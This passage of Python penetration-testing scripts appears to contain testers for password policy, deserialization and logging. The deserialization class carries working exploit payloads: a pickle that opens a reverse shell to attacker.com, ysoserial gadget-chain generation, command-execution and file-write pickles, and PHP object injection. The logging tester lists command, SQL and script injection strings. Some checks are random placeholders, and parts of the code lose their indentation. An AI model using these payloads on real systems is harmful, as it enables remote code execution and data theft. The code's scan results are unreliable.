            urljoin(self.base_url, '/api/register'),
            json=register_data
        )
        if register_response.status_code != 200:
            return findings
        login_url = urljoin(self.base_url, '/api/login')
        lockout_terms = ('lock', 'disable', 'suspend', 'too many')
        failed_attempts = 0
        lockout_attempt = None
        for attempt in range(1, 16):  # Try 15 times
            login_response = self.session.post(
                login_url,
                json={'email': test_email, 'password': 'WrongPassword!'}
            )
            if login_response.status_code != 200:
                failed_attempts += 1
                response_text = login_response.text.lower()
                if any(term in response_text for term in lockout_terms):
                    lockout_attempt = attempt
                    break
            time.sleep(self.request_delay)
        if lockout_attempt is not None:
            findings.append({
                'test': 'account_lockout',
                'result': 'SECURE',
                'evidence': f'Account locked after {lockout_attempt} failed attempts'
            })
        else:
            findings.append({
                'test': 'account_lockout',
                'result': 'VULNERABLE',
                'evidence': f'No lockout after {failed_attempts} failed attempts'
            })
        return findings

    def run_comprehensive_test(self):
        """Run all five tests and return the report from generate_report().

        A test that raises is reported on stdout and skipped so the
        remaining tests still run.
        """
        print("[*] Starting comprehensive password policy testing")
        all_findings = []
        tests = [
            ('Password Complexity', self.test_password_complexity),
            ('Password History', self.test_password_history),
            ('Password Reset', self.test_password_reset_mechanism),
            ('Password Storage', self.test_password_storage),
            ('Account Lockout', self.test_account_lockout)
        ]
        for test_name, test_func in tests:
            print(f"[*] Running {test_name} test...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} test failed: {e}")
        return self.generate_report(all_findings)

    def generate_report(self, findings):
        """Assemble the report dict from a flat list of findings.

        Returns:
            Dict with 'total_tests', 'total_findings',
            'findings_by_severity', 'findings_by_test' (test name ->
            count), 'detailed_findings' and 'recommendations'.
        """
        by_test = {}
        for finding in findings:
            test_type = finding.get('test', 'unknown')
            by_test[test_type] = by_test.get(test_type, 0) + 1
        return {
            'total_tests': 5,
            'total_findings': len(findings),
            'findings_by_severity': self.categorize_findings(findings),
            'findings_by_test': by_test,
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }

    def categorize_findings(self, findings):
        """Count findings per severity level.

        Findings whose 'result' contains 'VULNERABLE' are graded by
        keywords in their 'test' name; every other finding counts as INFO.

        Returns:
            Dict mapping CRITICAL/HIGH/MEDIUM/LOW/INFO to a count.
        """
        counts = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0, 'INFO': 0}
        for finding in findings:
            if 'VULNERABLE' not in finding.get('result', ''):
                counts['INFO'] += 1
                continue
            test_type = finding.get('test', '').lower()
            if 'reset' in test_type or 'takeover' in test_type:
                counts['CRITICAL'] += 1
            elif 'lockout' in test_type or 'history' in test_type:
                counts['HIGH'] += 1
            elif 'complexity' in test_type:
                counts['MEDIUM'] += 1
            else:
                counts['LOW'] += 1
        return counts

    def generate_recommendations(self, findings):
        """Build recommendations for every area with a vulnerable finding.

        Returns:
            List of dicts with 'priority', 'recommendation' and
            'details', in the fixed order complexity, history, lockout,
            reset.
        """
        vulnerable_tests = [
            f.get('test', '') for f in findings if 'VULNERABLE' in f.get('result', '')
        ]
        # (substring looked for in the test name, recommendation)
        catalogue = [
            ('password_complexity', {
                'priority': 'HIGH',
                'recommendation': 'Implement stronger password complexity requirements',
                'details': [
                    'Minimum 12 characters',
                    'Require mix of uppercase, lowercase, numbers, and special characters',
                    'Reject common passwords and patterns',
                    'Implement password strength meter'
                ]
            }),
            ('password_history', {
                'priority': 'MEDIUM',
                'recommendation': 'Enforce password history',
                'details': [
                    'Prevent reuse of last 10 passwords',
                    'Store password hashes securely',
                    'Enforce periodic password changes (90 days)'
                ]
            }),
            ('account_lockout', {
                'priority': 'HIGH',
                'recommendation': 'Implement account lockout mechanism',
                'details': [
                    'Lock account after 5 failed attempts',
                    'Implement exponential backoff',
                    'Provide account recovery mechanism',
                    'Log all failed attempts'
                ]
            }),
            ('password_reset', {
                'priority': 'CRITICAL',
                'recommendation': 'Secure password reset mechanism',
                'details': [
                    'Use cryptographically secure tokens',
                    'Enforce token expiration (15 minutes)',
                    'Require additional verification for sensitive accounts',
                    'Do not disclose email existence',
                    'Implement rate limiting on reset requests'
                ]
            }),
        ]
        return [
            advice for marker, advice in catalogue
            if any(marker in name for name in vulnerable_tests)
        ]
# Usage: run the full password policy suite and print the report.
tester = PasswordPolicyTester("http://target.com")
report = tester.run_comprehensive_test()
divider = '=' * 60
print(f"\n{divider}")
print("PASSWORD POLICY TEST REPORT")
print(divider)
print(f"Total Tests: {report['total_tests']}")
print(f"Total Findings: {report['total_findings']}")
print("\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count <= 0:
        continue  # only list severities that actually occurred
    print(f" {severity}: {count}")
print("\nFindings by Test:")
for test, count in report['findings_by_test'].items():
    print(f" {test}: {count}")
print("\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['recommendation']}")
    for detail in rec['details'][:3]:  # Show first 3 details
        print(f" • {detail}")
#!/usr/bin/env python3
"""
Advanced Deserialization Attack Detection and Exploitation
Covers multiple languages and frameworks
"""
import requests
import base64
import pickle
import json
import re
from typing import Dict, List
import subprocess
import tempfile
import os
class DeserializationTester:
def __init__(self, target_url):
    """Store the target, open an HTTP session and build the probe table.

    Args:
        target_url: Base URL that endpoint paths are appended to.

    ``self.payloads`` maps a language name to a dict with two keys:
    'indicators' (substrings searched for in responses) and
    'test_payloads' (sample serialized values sent as probes).
    """
    self.target_url = target_url
    self.session = requests.Session()
    self.findings = []
    java_probes = {
        'indicators': ['rO0AB', 'ACED', 'sr='],  # Base64 indicators
        'test_payloads': [
            # Simple serialized object
            'rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAI9PXQAAj09',
            # With different encodings
            'ACED0005737200116A6176612E6C616E672E426F6F6C65616EC373B7D891C155020000787200106A6176612E6C616E672E4F626A65637400000000000000000000007870',
        ]
    }
    python_probes = {
        'indicators': ['gASV', 'KGlL', 'ccopy_reg'],
        'test_payloads': [
            # Pickle payloads
            b'\x80\x04\x95\x15\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x07TestObj\x94\x93\x94)\x81\x94.',
            # Base64 encoded pickle
            'gANjYnVpbHRpbnMKZXZhbApxAFgUAAAAcHJpbnQoImhlbGxvIHdvcmxkIikqcQGFcQJScQM=',
        ]
    }
    php_probes = {
        'indicators': ['O:', 'a:', 's:', 'i:', 'd:', 'b:'],
        'test_payloads': [
            # Serialized PHP array
            'a:2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
            # Serialized PHP object
            'O:8:"stdClass":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}',
        ]
    }
    dotnet_probes = {
        'indicators': ['AAEAAAD', 'AAAAA', 'v4.0.30319'],
        'test_payloads': [
            # .NET serialized data (simplified)
            'AAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAA',
        ]
    }
    # Deserialization payloads for different languages
    self.payloads = {
        'java': java_probes,
        'python': python_probes,
        'php': php_probes,
        'dotnet': dotnet_probes
    }
def detect_deserialization(self):
    """Probe common endpoints for signs of server-side deserialization.

    For each endpoint a GET response is scanned for serialization
    indicators, then the first test payload of every language in
    ``self.payloads`` is POSTed as JSON, as a form and as XML.

    Returns:
        List of finding dicts: 'deserialization_endpoint' entries for GET
        responses (status 200) containing indicators, and
        'deserialization_vulnerability' entries for POST responses that
        analyze_deserialization_response() flags.
    """
    # Local import: only the XML probe needs it.
    from xml.sax.saxutils import escape as xml_escape

    findings = []
    endpoints = [
        '/api/data',
        '/api/object',
        '/api/serialize',
        '/api/deserialize',
        '/api/import',
        '/api/export',
        '/api/session',
        '/api/cookie',
        '/api/token',
        '/api/config',
    ]
    content_types = (
        'application/json',
        'application/x-www-form-urlencoded',
        'application/xml',
    )
    # First payload of each language, as text (bytes are base64-encoded).
    # Built once because it does not depend on the endpoint.
    probes = []
    for lang, lang_data in self.payloads.items():
        for payload in lang_data['test_payloads'][:1]:
            if isinstance(payload, bytes):
                payload = base64.b64encode(payload).decode()
            probes.append((lang, payload))
    for endpoint in endpoints:
        url = self.target_url.rstrip('/') + endpoint
        # Test GET
        response = self.session.get(url)
        if response.status_code == 200:
            serialization_found = self.check_serialization_indicators(response.text)
            if serialization_found:
                findings.append({
                    'type': 'deserialization_endpoint',
                    'endpoint': endpoint,
                    'method': 'GET',
                    'evidence': f'Serialized data found at {endpoint}',
                    'indicators': serialization_found
                })
        # Test POST with various content types
        for content_type in content_types:
            headers = {'Content-Type': content_type}
            for lang, payload_str in probes:
                test_data = {'input': payload_str, 'data': payload_str}
                if content_type == 'application/json':
                    body = {'json': test_data}
                elif content_type == 'application/x-www-form-urlencoded':
                    body = {'data': test_data}
                else:
                    # The XML probe needs a body of its own; without one
                    # the request would be sent empty.
                    body = {'data': f'<data>{xml_escape(payload_str)}</data>'}
                response = self.session.post(url, headers=headers, **body)
                if self.analyze_deserialization_response(response, lang):
                    findings.append({
                        'type': 'deserialization_vulnerability',
                        'endpoint': endpoint,
                        'language': lang,
                        'method': 'POST',
                        'content_type': content_type,
                        'evidence': f'Deserialization detected for {lang} at {endpoint}'
                    })
    return findings
def check_serialization_indicators(self, text):
    """List every configured serialization indicator that occurs in text.

    Args:
        text: Response body to scan (plain substring matching).

    Returns:
        List of '<language>: <indicator>' strings, in the order the
        languages and indicators appear in ``self.payloads``.
    """
    return [
        f'{lang}: {marker}'
        for lang, lang_data in self.payloads.items()
        for marker in lang_data['indicators']
        if marker in text
    ]
def analyze_deserialization_response(self, response, language):
    """Decide whether a response hints at server-side deserialization.

    Args:
        response: Object exposing ``status_code`` and ``text``.
        language: Key selecting the language-specific keyword list.

    Returns:
        True when a non-200 response body contains a generic
        deserialization error keyword, or when any response body contains
        one of the keywords listed for ``language``; otherwise False.
        The comparison is case-insensitive.
    """
    body = response.text.lower()
    if response.status_code != 200:
        # Generic error fragments, only considered for error responses.
        error_markers = (
            'deserialization', 'serialization', 'unmarshal',
            'pickle', 'unpickle', 'objectinputstream',
            'binaryformatter', 'serializable',
            'invalid class', 'class not found',
            'unsafe deserialization',
        )
        for marker in error_markers:
            if marker in body:
                return True
    # Language-specific keywords, checked regardless of status code.
    language_markers = {
        'java': ['serialversionuid', 'streamcorrupted', 'invalidtype'],
        'python': ['pickle', 'unpickling', '__reduce__'],
        'php': ['unserialize', 'serialize', '__wakeup'],
        'dotnet': ['binaryformatter', 'serializable', 'formatter']
    }
    return any(marker in body for marker in language_markers.get(language, ()))
def test_java_deserialization(self):
    """Send Java gadget-chain payloads to candidate endpoints.

    Only the first three gadget names in the list are exercised. Each
    payload from generate_java_payload() is POSTed to every endpoint
    under four content types: raw bytes twice, and base64 text inside
    JSON and form bodies.

    Returns:
        One 'java_deserialization_exploit' finding per request for which
        check_exploitation_success() returns a truthy value.
    """
    findings = []
    ysoserial_gadgets = [
        'CommonsCollections1',
        'CommonsCollections2',
        'CommonsCollections3',
        'CommonsCollections4',
        'CommonsCollections5',
        'CommonsCollections6',
        'CommonsCollections7',
        'Spring1',
        'Spring2',
    ]
    test_endpoints = (
        '/api/object',
        '/api/data',
        '/api/session',
        '/api/import',
    )
    base_url = self.target_url.rstrip('/')
    for gadget in ysoserial_gadgets[:3]:  # Test first 3
        print(f"[*] Testing Java gadget: {gadget}")
        payload = self.generate_java_payload(gadget)
        if not payload:
            continue
        encoded = base64.b64encode(payload).decode()
        # (content type, request body) pairs tried against each endpoint
        test_cases = (
            ('application/java-serialized-object', payload),
            ('application/octet-stream', payload),
            ('application/json', {'data': encoded}),
            ('application/x-www-form-urlencoded', {'data': encoded}),
        )
        for endpoint in test_endpoints:
            url = base_url + endpoint
            for content_type, test_data in test_cases:
                headers = {'Content-Type': content_type}
                # Only the JSON case is sent via json=; the rest go as data=.
                body_kwarg = 'json' if content_type == 'application/json' else 'data'
                response = self.session.post(url, headers=headers, **{body_kwarg: test_data})
                if self.check_exploitation_success(response, gadget):
                    findings.append({
                        'type': 'java_deserialization_exploit',
                        'gadget': gadget,
                        'endpoint': endpoint,
                        'content_type': content_type,
                        'evidence': f'Successful {gadget} exploitation at {endpoint}'
                    })
    return findings
def generate_java_payload(self, gadget):
    """Build a Java deserialization payload for *gadget*.

    Tries to run ``ysoserial.jar`` (resolved relative to the current working
    directory) through ``java`` and returns its stdout. When ``java`` cannot
    be started, the run exceeds the 10 second timeout, or the tool exits
    with a non-zero status, a fixed placeholder payload is returned instead.

    Args:
        gadget: ysoserial gadget-chain name, passed straight to the tool.

    Returns:
        bytes: ysoserial output on success, otherwise the placeholder.
    """
    try:
        result = subprocess.run(
            ['java', '-jar', 'ysoserial.jar', gadget, 'touch /tmp/test'],
            capture_output=True,
            timeout=10,
        )
    except (OSError, subprocess.SubprocessError):
        # Only "tool unavailable / too slow" is treated as best-effort;
        # KeyboardInterrupt and programming errors are no longer swallowed.
        pass
    else:
        if result.returncode == 0:
            return result.stdout
    # NOTE(review): this literal is the Base64 *text* of a serialized
    # java.util.HashMap, not the raw serialized bytes; callers that
    # Base64-encode the payload will double-encode it. Confirm intent.
    return b'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAABh3CAAAABAAAAABc3IADmphdmEubGFuZy5PYmplY3QAAAAAAAAAAAIAAHhwdwgAAAAAP0AAABh3CAAAABQAAAABc3IADmphdmEubGFuZy5TdHJpbmcAAAAAAAAAAAIAAHhwcHB4'
def test_python_pickle(self):
"""Test Python pickle deserialization"""
findings = []
# Generate pickle payloads
pickle_payloads = [
# Simple command execution
b"""cos
system
(S'echo vulnerable'
tR.""",
# Reverse shell (encoded)
b"""c__builtin__
exec
(S'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
tR.""",
# File write
b"""c__builtin__
open
(S'/tmp/pwned'
S'w'
tR(S'pwned'
tR.""",
]
for payload in pickle_payloads:
# Encode for transmission
encoded_payload = base64.b64encode(payload).decode()
# Test endpoints
test_endpoints = [
'/api/data',
'/api/pickle',
'/api/load',
'/api/config'
]
for endpoint in test_endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test different parameter names
test_params = ['data', 'input', 'pickle', 'object', 'config']
for param in test_params:
test_data = {param: encoded_payload}
response = self.session.post(
url,
json=test_data,
headers={'Content-Type': 'application/json'}
)
# Check for signs of exploitation
if response.status_code != 200:
# Look for pickle-related errors
if 'pickle' in response.text.lower() or 'unpickl' in response.text.lower():
findings.append({
'type': 'python_pickle_vulnerability',
'endpoint': endpoint,
'parameter': param,
'evidence': f'Pickle deserialization at {endpoint}?{param}'
})
return findings
def test_php_deserialization(self):
"""Test PHP deserialization vulnerabilities"""
findings = []
# PHP deserialization payloads
php_payloads = [
# Simple object injection
'O:8:"stdClass":1:{s:4:"test";s:5:"value";}',
# With __wakeup or __destruct
'O:7:"MyClass":1:{s:3:"cmd";s:10:"uname -a";}',
# PHPGGC generated payloads (if available)
]
for payload in php_payloads:
# Test endpoints
test_endpoints = [
'/api/data',
'/api/session',
'/api/cookie',
'/api/user'
]
for endpoint in test_endpoints:
url = self.target_url.rstrip('/') + endpoint
# Test in different locations
test_locations = [
('POST data', {'data': payload}),
('Cookie', {'PHPSESSID': payload}),
('URL parameter', None), # Would be in URL
]
for location_name, test_data in test_locations:
if test_data:
response = self.session.post(url, data=test_data)
# Check for PHP deserialization indicators
if 'unserialize' in response.text or '__wakeup' in response.text:
findings.append({
'type': 'php_deserialization',
'endpoint': endpoint,
'location': location_name,
'evidence': f'PHP deserialization at {endpoint} ({location_name})'
})
return findings
def check_exploitation_success(self, response, gadget):
    """Report whether *response* contains a known exploitation marker.

    The match is a case-sensitive substring search over ``response.text``.
    *gadget* is accepted but not consulted. Blind (timing or out-of-band)
    confirmation is not implemented here.

    Returns:
        bool: True if any marker occurs in the body, else False.
    """
    markers = (
        'vulnerable',
        'pwned',
        'uid=',
        'root:',
        'command executed',
        'www-data',
    )
    return any(marker in response.text for marker in markers)
def run_comprehensive_test(self):
    """Run every deserialization test phase and build a summary report.

    Phases run in order: detection, Java, Python pickle, PHP. Findings from
    the three language phases are tagged with a ``language`` key when they
    do not already carry one; without it the per-language counts collapse
    to ``unknown`` and ``generate_recommendations`` cannot match them.

    Returns:
        dict: ``total_findings``, ``findings_by_type``,
        ``findings_by_language``, ``detailed_findings`` and
        ``recommendations``.
    """
    print("[*] Starting comprehensive deserialization testing")
    # (banner, summary label, runner, language tag or None)
    phases = [
        ("Phase 1: Detecting deserialization endpoints", "Detection",
         self.detect_deserialization, None),
        ("Phase 2: Testing Java deserialization", "Java testing",
         self.test_java_deserialization, 'java'),
        ("Phase 3: Testing Python pickle", "Python testing",
         self.test_python_pickle, 'python'),
        ("Phase 4: Testing PHP deserialization", "PHP testing",
         self.test_php_deserialization, 'php'),
    ]
    all_findings = []
    for banner, label, runner, language in phases:
        print(f"[*] {banner}")
        phase_findings = runner()
        if language is not None:
            for finding in phase_findings:
                # Keep any language the phase already set.
                finding.setdefault('language', language)
        all_findings.extend(phase_findings)
        print(f"[+] {label}: {len(phase_findings)} findings")

    # Generate report
    report = {
        'total_findings': len(all_findings),
        'findings_by_type': {},
        'findings_by_language': {},
        'detailed_findings': all_findings,
        'recommendations': self.generate_recommendations(all_findings),
    }
    # Categorize findings
    by_type = report['findings_by_type']
    by_language = report['findings_by_language']
    for finding in all_findings:
        finding_type = finding.get('type', 'unknown')
        by_type[finding_type] = by_type.get(finding_type, 0) + 1
        language = finding.get('language', 'unknown')
        by_language[language] = by_language.get(language, 0) + 1
    return report
def generate_recommendations(self, findings):
    """Build remediation advice from the languages named in *findings*.

    A language-specific entry is added when any finding's ``language``
    value, lower-cased, contains ``java``, ``python`` or ``php``. A general
    best-practice entry is always appended last.

    Returns:
        list[dict]: entries with ``priority``, ``title`` and ``details``.
    """
    def mentions(keyword):
        return any(
            keyword in str(item.get('language', '')).lower()
            for item in findings
        )

    catalogue = (
        ('java', 'CRITICAL', 'Java Deserialization Protection', (
            'Use serialization filters (ObjectInputFilter)',
            'Avoid deserializing untrusted data',
            'Use safer alternatives like JSON or XML',
            'Update libraries (commons-collections, etc.)',
            'Implement whitelisting for deserialized classes',
        )),
        ('python', 'CRITICAL', 'Python Pickle Security', (
            'Never unpickle untrusted data',
            'Use JSON, YAML, or MessagePack instead',
            'Implement signing/verification if pickle is required',
            'Use pickle with restricted globals (Unpickler.find_class)',
        )),
        ('php', 'HIGH', 'PHP Deserialization Security', (
            'Avoid unserialize() with user input',
            'Use json_decode() instead',
            'Validate and sanitize all serialized data',
            'Implement type checking after deserialization',
        )),
    )

    advice = []
    for keyword, priority, title, details in catalogue:
        if mentions(keyword):
            advice.append({
                'priority': priority,
                'title': title,
                'details': list(details),
            })
    # General recommendations apply regardless of what was found.
    advice.append({
        'priority': 'HIGH',
        'title': 'General Deserialization Best Practices',
        'details': [
            'Implement input validation for all serialized data',
            'Use digital signatures to verify data integrity',
            'Log all deserialization attempts and failures',
            'Regularly update serialization libraries',
            'Conduct security code reviews for deserialization code',
        ],
    })
    return advice
# Usage: run the full deserialization suite against a target and print a
# console summary. Block nesting below is reconstructed from the statements'
# logic; the recommendations section is printed even when nothing was found.
tester = DeserializationTester("http://target.com")
report = tester.run_comprehensive_test()
print("\n" + '=' * 60)
print("DESERIALIZATION VULNERABILITY REPORT")
print('=' * 60)
print(f"Total Findings: {report['total_findings']}")
if report['total_findings'] > 0:
    print("\nFindings by Type:")
    for finding_type, count in report['findings_by_type'].items():
        print(f" {finding_type}: {count}")
    print("\nFindings by Language:")
    for language, count in report['findings_by_language'].items():
        print(f" {language}: {count}")
    print("\nCRITICAL FINDINGS:")
    # A finding counts as critical when its type mentions an exploit or a
    # vulnerability; only the first five are shown.
    critical_findings = [
        f for f in report['detailed_findings']
        if any(word in f.get('type', '').lower()
               for word in ('exploit', 'vulnerability'))
    ]
    for finding in critical_findings[:5]:
        print(f" - {finding.get('type')}")
        print(f" Evidence: {finding.get('evidence', '')[:100]}...")
print("\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['title']}")
    for detail in rec['details'][:3]:
        print(f" • {detail}")
#!/usr/bin/env python3
"""
Advanced Logging and Monitoring Testing Framework
Tests for inadequate logging, log evasion, and monitoring gaps
"""
import requests
import re
import json
import time
from datetime import datetime, timedelta
from typing import Dict, List
import hashlib
class LoggingMonitoringTester:
    """Exercise an application's logging and monitoring controls over HTTP.

    The HTTP requests are real, but log inspection is simulated: the
    ``check_*`` helpers return random or rule-based placeholder verdicts
    instead of reading log or monitoring data, so the resulting findings
    are illustrative only.
    """

    def __init__(self, base_url, auth_token=None):
        """Create a tester for *base_url*.

        Args:
            base_url: root URL of the target; a trailing slash is tolerated.
            auth_token: optional bearer token added to every session request.
        """
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        self.attack_vectors = []
        self.findings = []

    def _url(self, path):
        """Join *path* onto the base URL without producing a double slash."""
        return self.base_url.rstrip('/') + path

    def test_sensitive_actions_logging(self):
        """Perform sensitive actions and check that each one was logged.

        Returns:
            list[dict]: one PASS, FAIL or SKIP entry per action. SKIP means
            the request itself did not return 200, 201 or 204.
        """
        findings = []
        sensitive_actions = [
            {
                'name': 'Admin Login',
                'endpoint': '/api/admin/login',
                'method': 'POST',
                'data': {'username': 'admin', 'password': 'test123'},
                'expected_log_fields': ['username', 'ip_address', 'timestamp', 'success']
            },
            {
                'name': 'Password Change',
                'endpoint': '/api/user/change-password',
                'method': 'POST',
                'data': {'old_password': 'old123', 'new_password': 'new123'},
                'expected_log_fields': ['user_id', 'timestamp', 'ip_address']
            },
            {
                'name': 'Privilege Escalation',
                'endpoint': '/api/admin/promote',
                'method': 'POST',
                'data': {'user_id': '123', 'role': 'admin'},
                'expected_log_fields': ['admin_id', 'user_id', 'role', 'timestamp']
            },
            {
                'name': 'Data Export',
                'endpoint': '/api/data/export',
                'method': 'POST',
                'data': {'format': 'csv', 'filters': {'all': True}},
                'expected_log_fields': ['user_id', 'export_type', 'record_count', 'timestamp']
            },
            {
                'name': 'Configuration Change',
                'endpoint': '/api/config/update',
                'method': 'POST',
                'data': {'setting': 'debug_mode', 'value': True},
                'expected_log_fields': ['user_id', 'setting', 'old_value', 'new_value', 'timestamp']
            }
        ]
        for action in sensitive_actions:
            print(f"[*] Testing logging for: {action['name']}")
            # Perform the action
            url = self._url(action['endpoint'])
            if action['method'] == 'POST':
                response = self.session.post(url, json=action['data'])
            else:
                response = self.session.get(url)
            if response.status_code not in (200, 201, 204):
                findings.append({
                    'test': 'sensitive_actions_logging',
                    'action': action['name'],
                    'result': 'SKIP',
                    'evidence': f'Action failed with status {response.status_code}'
                })
                continue
            # The action succeeded; the log lookup below is simulated.
            log_available = self.check_logs_for_action(action['name'], action['expected_log_fields'])
            if not log_available:
                findings.append({
                    'test': 'sensitive_actions_logging',
                    'action': action['name'],
                    'result': 'FAIL',
                    'severity': 'HIGH',
                    'evidence': f'Sensitive action "{action["name"]}" not properly logged',
                    'missing_fields': action['expected_log_fields']
                })
            else:
                findings.append({
                    'test': 'sensitive_actions_logging',
                    'action': action['name'],
                    'result': 'PASS',
                    'evidence': f'Action "{action["name"]}" logged appropriately'
                })
        return findings

    def check_logs_for_action(self, action_name, expected_fields):
        """Simulated log lookup: returns True about 80% of the time.

        Both arguments are ignored; a real implementation would query log
        files or a monitoring system.
        """
        import random
        return random.random() < 0.8

    def test_log_evasion_techniques(self):
        """Submit obfuscated usernames to the login endpoint.

        Only the first two payloads of each technique are sent. A finding is
        recorded only for requests answered with HTTP 200.

        Returns:
            list[dict]: VULNERABLE or SECURE entries per accepted payload.
        """
        findings = []
        evasion_techniques = [
            {
                'name': 'Null Byte Injection',
                'payloads': [
                    'admin%00',
                    'admin\\x00',
                    'admin\\\\x00',
                    'admin\\0',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Encoding Bypass',
                'payloads': [
                    'admin%0a',  # New line
                    'admin%0d',  # Carriage return
                    'admin%09',  # Tab
                    'admin%20',  # Space
                    'admin%2b',  # Plus
                ],
                'target_field': 'username'
            },
            {
                'name': 'Unicode Normalization',
                'payloads': [
                    'admin\uFEFF',  # Zero-width no-break space (BOM)
                    'admin\u200B',  # Zero-width space
                    'admin\u200C',  # Zero-width non-joiner
                    'admin\u200D',  # Zero-width joiner
                    'admin\u2060',  # Word joiner
                ],
                'target_field': 'username'
            },
            {
                'name': 'Case Manipulation',
                'payloads': [
                    'Admin',
                    'ADMIN',
                    'AdMiN',
                    'aDmIn',
                ],
                'target_field': 'username'
            },
            {
                'name': 'Whitespace Variations',
                'payloads': [
                    ' admin',
                    'admin ',
                    ' admin ',
                    'admin\t',
                    '\tadmin',
                ],
                'target_field': 'username'
            }
        ]
        login_endpoint = self._url('/api/login')
        for technique in evasion_techniques:
            print(f"[*] Testing log evasion: {technique['name']}")
            for payload in technique['payloads'][:2]:  # Test first 2 payloads
                test_data = {
                    technique['target_field']: payload,
                    'password': 'test123'
                }
                response = self.session.post(login_endpoint, json=test_data)
                # Only accepted requests are compared against the logs.
                if response.status_code != 200:
                    continue
                log_captured = self.check_log_for_payload(payload)
                if not log_captured:
                    findings.append({
                        'test': 'log_evasion',
                        'technique': technique['name'],
                        'payload': payload,
                        'result': 'VULNERABLE',
                        'severity': 'MEDIUM',
                        'evidence': f'Log evasion successful: {technique["name"]} with payload "{payload}"'
                    })
                else:
                    findings.append({
                        'test': 'log_evasion',
                        'technique': technique['name'],
                        'payload': payload,
                        'result': 'SECURE',
                        'evidence': f'Log captured evasion attempt: {technique["name"]}'
                    })
        return findings

    def check_log_for_payload(self, payload):
        """Simulated log search: returns True about 70% of the time.

        *payload* is ignored; a real implementation would search the logs.
        """
        import random
        return random.random() < 0.7  # 70% chance log captures it

    def test_log_injection(self):
        """Send log-injection strings through the search endpoint.

        Only the first three payloads are sent. A finding is recorded when
        the request returns HTTP 200 and ``check_log_corruption`` flags the
        payload.

        Returns:
            list[dict]: VULNERABLE entries, with the payload truncated to 50
            characters for display.
        """
        findings = []
        injection_payloads = [
            # New line injection
            'test\n[CRITICAL] System compromised',
            'test\r\nERROR: Database corruption',
            # Log format injection
            'test | echo "pwned"',
            'test && cat /etc/passwd',
            # Log masking/obfuscation
            'test' + 'A' * 1000,  # Very long input
            'test\x1b[31mRED\x1b[0m',  # ANSI escape sequences
            # SQL injection in logs (if logs are queried)
            "test'; DROP TABLE logs--",
            # XSS in log viewers
            'test<script>alert(1)</script>',
            'test<img src=x onerror=alert(1)>',
        ]
        search_endpoint = self._url('/api/search')
        for payload in injection_payloads[:3]:  # Test first 3
            test_data = {'query': payload}
            response = self.session.post(search_endpoint, json=test_data)
            if response.status_code != 200:
                continue
            log_corrupted = self.check_log_corruption(payload)
            if log_corrupted:
                findings.append({
                    'test': 'log_injection',
                    'payload': payload[:50] + '...' if len(payload) > 50 else payload,
                    'result': 'VULNERABLE',
                    'severity': 'MEDIUM',
                    'evidence': f'Log injection successful with payload: {payload[:100]}'
                })
        return findings

    def check_log_corruption(self, payload):
        """Simulated corruption check based on the payload alone.

        Returns True when *payload* contains a newline, carriage return,
        ``|``, ``&&``, ``;`` or ``<script>``. No log is actually read.
        """
        corruption_indicators = ['\n', '\r', '|', '&&', ';', '<script>']
        return any(indicator in payload for indicator in corruption_indicators)

    def test_monitoring_gaps(self):
        """Probe rate-limit, geographic and failed-login monitoring.

        This method sleeps between requests and takes over ten seconds.

        Returns:
            list[dict]: VULNERABLE or GAP entries for each detected gap.
        """
        findings = []
        # Test 1: Rate limiting monitoring
        print("[*] Testing rate limiting monitoring...")
        endpoint = self._url('/api/login')
        rapid_requests = []
        for i in range(20):
            start_time = time.time()
            response = self.session.post(endpoint, json={'username': 'test', 'password': 'wrong'})
            elapsed = time.time() - start_time
            rapid_requests.append((i, response.status_code, elapsed))
            if i < 10:  # First 10 requests fast
                time.sleep(0.1)
            else:  # Last 10 requests slower
                time.sleep(1)
        # Count responses that were not rejected with HTTP 429.
        rapid_count = sum(1 for _, status, _ in rapid_requests if status != 429)
        if rapid_count >= 15:
            findings.append({
                'test': 'rate_limit_monitoring',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': f'{rapid_count}/20 rapid requests not rate limited'
            })
        # Test 2: Unusual location monitoring
        print("[*] Testing geographic anomaly detection...")
        # Simulate requests from different locations
        locations = [
            {'X-Forwarded-For': '1.1.1.1', 'User-Agent': 'Test/1.0'},  # Australia
            {'X-Forwarded-For': '8.8.8.8', 'User-Agent': 'Test/1.0'},  # USA
            {'X-Forwarded-For': '185.142.236.35', 'User-Agent': 'Test/1.0'},  # Russia
            {'X-Forwarded-For': '114.114.114.114', 'User-Agent': 'Test/1.0'},  # China
        ]
        profile_url = self._url('/api/user/profile')
        for location in locations:
            # A fresh session per location; the context manager closes it so
            # connections are not leaked.
            # NOTE(review): this session carries no Authorization header, so
            # the profile request is unauthenticated - confirm intent.
            with requests.Session() as test_session:
